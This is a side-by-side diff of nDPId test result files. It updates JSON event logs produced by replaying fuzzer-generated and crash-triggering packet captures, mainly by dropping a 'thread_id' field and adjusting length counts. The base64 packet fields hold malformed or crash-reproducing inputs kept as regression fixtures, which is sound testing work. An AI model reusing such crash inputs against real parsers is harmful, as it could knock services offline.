00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1528998576080,"flow_last_seen":1528998643334,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":7430,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1528998576080,"flow_last_seen":1528998643334,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":7430,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1528998257171,"flow_last_seen":1528998557443,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":2362,"flow_avg_l4_payload_len":472,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1528998257171,"flow_last_seen":1528998557443,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":2362,"flow_avg_l4_payload_len":472,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998605816,"flow_last_seen":1528998605816,"flow_idle_time":180000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":21008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":366,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998605816,"flow_last_seen":1528998605816,"flow_idle_time":180000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1528998643334,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":21008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
@@ -494,6 +494,6 @@
~~ total memory freed........: 4771269 bytes ~~ total memory freed........: 4771269 bytes
~~ total allocations/frees...: 101718/101718 ~~ total allocations/frees...: 101718/101718
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 215 chars ~~ json string min len.......: 201 chars
~~ json string max len.......: 1566 chars ~~ json string max len.......: 1566 chars
~~ json string avg len.......: 890 chars ~~ json string avg len.......: 883 chars

12
test/results/fuzz-2021-06-07-c6c72a0a56.pcap.out
View File

@@ -1,9 +1,9 @@
00477{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"fuzz-2021-06-07-c6c72a0a56.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00477{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"fuzz-2021-06-07-c6c72a0a56.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00488{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"fuzz-2021-06-07-c6c72a0a56.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":18448697704865147} 00488{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"fuzz-2021-06-07-c6c72a0a56.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":18448697704865147}
00356{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1,"source":"fuzz-2021-06-07-c6c72a0a56.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":48,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":48,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"\/wAAJAAjAMBfnZUlCABF\/4mFRACAAFARjVhmboAgAAb\/AAho0tcI0wgALf8gewty"} 00342{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"fuzz-2021-06-07-c6c72a0a56.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":48,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":48,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"\/wAAJAAjAMBfnZUlCABF\/4mFRACAAFARjVhmboAgAAb\/AAho0tcI0wgALf8gewty"}
00273{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":1,"source":"fuzz-2021-06-07-c6c72a0a56.pcap","alias":"nDPId-test","size":48,"expected":4093509168,"global_ts_msec":18448697704865147} 00259{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":1,"source":"fuzz-2021-06-07-c6c72a0a56.pcap","alias":"nDPId-test","size":48,"expected":4093509168,"global_ts_msec":18448697704865147}
00356{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1,"source":"fuzz-2021-06-07-c6c72a0a56.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":48,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":48,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"\/wAAJAAjAMBfnZUlCABF\/4mFRACAAFARjVhmboAgAAb\/AAho0tcI0wgALf8gewty"} 00342{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"fuzz-2021-06-07-c6c72a0a56.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":48,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":48,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"\/wAAJAAjAMBfnZUlCABF\/4mFRACAAFARjVhmboAgAAb\/AAho0tcI0wgALf8gewty"}
00238{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":1,"source":"fuzz-2021-06-07-c6c72a0a56.pcap","alias":"nDPId-test","l4_data_len":14,"global_ts_msec":18448697704865147} 00224{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1,"source":"fuzz-2021-06-07-c6c72a0a56.pcap","alias":"nDPId-test","l4_data_len":14,"global_ts_msec":18448697704865147}
00490{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"fuzz-2021-06-07-c6c72a0a56.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":7,"global_ts_msec":18448697704865147} 00490{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"fuzz-2021-06-07-c6c72a0a56.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":7,"global_ts_msec":18448697704865147}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 1/0 ~~ packets captured/processed: 1/0
@@ -17,6 +17,6 @@
~~ total memory freed........: 4678926 bytes ~~ total memory freed........: 4678926 bytes
~~ total allocations/frees...: 101140/101140 ~~ total allocations/frees...: 101140/101140
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 243 chars ~~ json string min len.......: 229 chars
~~ json string max len.......: 495 chars ~~ json string max len.......: 495 chars
~~ json string avg len.......: 373 chars ~~ json string avg len.......: 366 chars

10
test/results/fuzz-2021-10-13.pcap.out
View File

@@ -1,7 +1,7 @@
00466{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"fuzz-2021-10-13.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00466{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"fuzz-2021-10-13.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00472{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"fuzz-2021-10-13.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":980658803882} 00472{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"fuzz-2021-10-13.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":980658803882}
00546{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1,"source":"fuzz-2021-10-13.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":197,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":197,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AC8AbGXLAAAAlQZ\/NAA6MDA1L3VwbG8yZD9sPTAuAAAAAAAAAAA9AAAAgAGtAAAAPAEAADUAMMkAAFsEMjk5oIBtrTHFxwpdEDIAAQBGAAAAaXAAc+dXAAAAAAAIAAoAAAD\/MvsABgAAAAAAAAAAAAAAAAAAAAAkABAAAAAAAAA8AQAAAAAACJcFAAAA\/zL7AAYAAP9NPLKhAgAAAI8NOwAAAH8AAhwAAQAAAAAAECA\/BeIoAAAAACA9eC75+f\/\/xQAAAAA="} 00532{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"fuzz-2021-10-13.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":197,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":197,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AC8AbGXLAAAAlQZ\/NAA6MDA1L3VwbG8yZD9sPTAuAAAAAAAAAAA9AAAAgAGtAAAAPAEAADUAMMkAAFsEMjk5oIBtrTHFxwpdEDIAAQBGAAAAaXAAc+dXAAAAAAAIAAoAAAD\/MvsABgAAAAAAAAAAAAAAAAAAAAAkABAAAAAAAAA8AQAAAAAACJcFAAAA\/zL7AAYAAP9NPLKhAgAAAI8NOwAAAH8AAhwAAQAAAAAAECA\/BeIoAAAAACA9eC75+f\/\/xQAAAAA="}
00217{"basic_event_id":1,"basic_event_name":"Unknown datalink layer packet","datalink":0,"thread_id":0,"packet_id":1,"source":"fuzz-2021-10-13.pcap","alias":"nDPId-test","layer_type":3080300,"global_ts_msec":980658803882} 00203{"basic_event_id":1,"basic_event_name":"Unknown datalink layer packet","datalink":0,"packet_id":1,"source":"fuzz-2021-10-13.pcap","alias":"nDPId-test","layer_type":3080300,"global_ts_msec":980658803882}
00474{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"fuzz-2021-10-13.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":5,"global_ts_msec":980658803882} 00474{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"fuzz-2021-10-13.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":5,"global_ts_msec":980658803882}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 1/0 ~~ packets captured/processed: 1/0
@@ -15,6 +15,6 @@
~~ total memory freed........: 4678926 bytes ~~ total memory freed........: 4678926 bytes
~~ total allocations/frees...: 101140/101140 ~~ total allocations/frees...: 101140/101140
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 222 chars ~~ json string min len.......: 208 chars
~~ json string max len.......: 551 chars ~~ json string max len.......: 537 chars
~~ json string avg len.......: 397 chars ~~ json string avg len.......: 386 chars

42
test/results/http-crash-content-disposition.pcap.out
View File

@@ -1,23 +1,23 @@
00481{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00481{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00488{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":1492518365663} 00488{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":1492518365663}
00369{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPNS7QABABvZlwKgAZ66BAArH4wBQe0WpbgAAAACgAjkINI0AAAIEBbQEAggKABR91QAAAAABAwMG"} 00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPNS7QABABvZlwKgAZ66BAArH4wBQe0WpbgAAAACgAjkINI0AAAIEBbQEAggKABR91QAAAAABAwMG"}
00210{"basic_event_id":3,"basic_event_name":"Unsupported datalink layer","datalink":12,"thread_id":0,"packet_id":1,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365663} 00196{"basic_event_id":3,"basic_event_name":"Unsupported datalink layer","datalink":12,"packet_id":1,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365663}
00370{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPAAAQAAtBt4hroEACsCoAGcAUMfjkVcfantFqW+gEjiQ\/PYAAAIEBawEAggKK6FboQAUfdUBAwMH"} 00356{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPAAAQAAtBt4hroEACsCoAGcAUMfjkVcfantFqW+gEjiQ\/PYAAAIEBawEAggKK6FboQAUfdUBAwMH"}
00210{"basic_event_id":3,"basic_event_name":"Unsupported datalink layer","datalink":12,"thread_id":0,"packet_id":2,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365767} 00196{"basic_event_id":3,"basic_event_name":"Unsupported datalink layer","datalink":12,"packet_id":2,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365767}
00361{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":3,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANNS8QABABvZswKgAZ66BAArH4wBQe0Wpb5FXH2uAEADlY08AAAEBCAoAFH3sK6FboQ=="} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANNS8QABABvZswKgAZ66BAArH4wBQe0Wpb5FXH2uAEADlY08AAAEBCAoAFH3sK6FboQ=="}
00210{"basic_event_id":3,"basic_event_name":"Unsupported datalink layer","datalink":12,"thread_id":0,"packet_id":3,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365789} 00196{"basic_event_id":3,"basic_event_name":"Unsupported datalink layer","datalink":12,"packet_id":3,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365789}
00933{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":4,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":480,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":480,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAB4NS9QABABvS\/wKgAZ66BAArH4wBQe0Wpb5FXH2uAGADlVxoAAAEBCAoAFH3uK6FboVBPU1QgL2ltZXNzYWdlcy5waHA\/c29uZ2lmeV9hPTNoMjQ4Zklid0ombmV3IEhUVFAvMS4xDQpDb250ZW50LUxlbmd0aDogMjIwDQpDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PTV2N0xoYm5hMnJld0hyajBlX0Y4d3IwV0FWVHBZOTNFVDlpUUhEeQ0KSG9zdDoga2h1LnNoDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBBcGFjaGUtSHR0cENsaWVudC9VTkFWQUlMQUJMRSAoamF2YSAxLjQpDQoNCi0tNXY3TGhibmEycmV3SHJqMGVfRjh3cjBXQVZUcFk5M0VUOWlRSER5DQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImlzYW5kcm9pZCINCkNvbnRlbnQtVHlwZTogdGV4dC9wbGFpbjsgY2hhcnNldD1VUy1BU0NJSQ0KQ29udGVudC1UcmFuc2Zlci1FbmNvZGluZzogOGJpdA0KDQox"} 00919{"packet_event_id":1,"packet_event_name":"packet","packet_id":4,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":480,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":480,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAB4NS9QABABvS\/wKgAZ66BAArH4wBQe0Wpb5FXH2uAGADlVxoAAAEBCAoAFH3uK6FboVBPU1QgL2ltZXNzYWdlcy5waHA\/c29uZ2lmeV9hPTNoMjQ4Zklid0ombmV3IEhUVFAvMS4xDQpDb250ZW50LUxlbmd0aDogMjIwDQpDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PTV2N0xoYm5hMnJld0hyajBlX0Y4d3IwV0FWVHBZOTNFVDlpUUhEeQ0KSG9zdDoga2h1LnNoDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBBcGFjaGUtSHR0cENsaWVudC9VTkFWQUlMQUJMRSAoamF2YSAxLjQpDQoNCi0tNXY3TGhibmEycmV3SHJqMGVfRjh3cjBXQVZUcFk5M0VUOWlRSER5DQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImlzYW5kcm9pZCINCkNvbnRlbnQtVHlwZTogdGV4dC9wbGFpbjsgY2hhcnNldD1VUy1BU0NJSQ0KQ29udGVudC1UcmFuc2Zlci1FbmNvZGluZzogOGJpdA0KDQox"}
00210{"basic_event_id":3,"basic_event_name":"Unsupported datalink layer","datalink":12,"thread_id":0,"packet_id":4,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365809} 00196{"basic_event_id":3,"basic_event_name":"Unsupported datalink layer","datalink":12,"packet_id":4,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365809}
00421{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":5,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":99,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":99,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAY9S+QABABvY7wKgAZ66BAArH4wBQe0WrG5FXH2uAGADlbXAAAAEBCAoAFH3uK6FboQ0KLS01djdMaGJuYTJyZXdIcmowZV9GOHdyMFdBVlRwWTkzRVQ5aVFIRHktLQ0K"} 00407{"packet_event_id":1,"packet_event_name":"packet","packet_id":5,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":99,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":99,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAY9S+QABABvY7wKgAZ66BAArH4wBQe0WrG5FXH2uAGADlbXAAAAEBCAoAFH3uK6FboQ0KLS01djdMaGJuYTJyZXdIcmowZV9GOHdyMFdBVlRwWTkzRVQ5aVFIRHktLQ0K"}
00210{"basic_event_id":3,"basic_event_name":"Unsupported datalink layer","datalink":12,"thread_id":0,"packet_id":5,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365809} 00196{"basic_event_id":3,"basic_event_name":"Unsupported datalink layer","datalink":12,"packet_id":5,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365809}
00361{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":6,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANEN0QAAtBpq1roEACsCoAGcAUMfjkVcfa3tFqxuAEAB6YXsAAAEBCAoroVwyABR97g=="} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANEN0QAAtBpq1roEACsCoAGcAUMfjkVcfa3tFqxuAEAB6YXsAAAEBCAoroVwyABR97g=="}
00210{"basic_event_id":3,"basic_event_name":"Unsupported datalink layer","datalink":12,"thread_id":0,"packet_id":6,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365913} 00196{"basic_event_id":3,"basic_event_name":"Unsupported datalink layer","datalink":12,"packet_id":6,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","global_ts_msec":1492518365913}
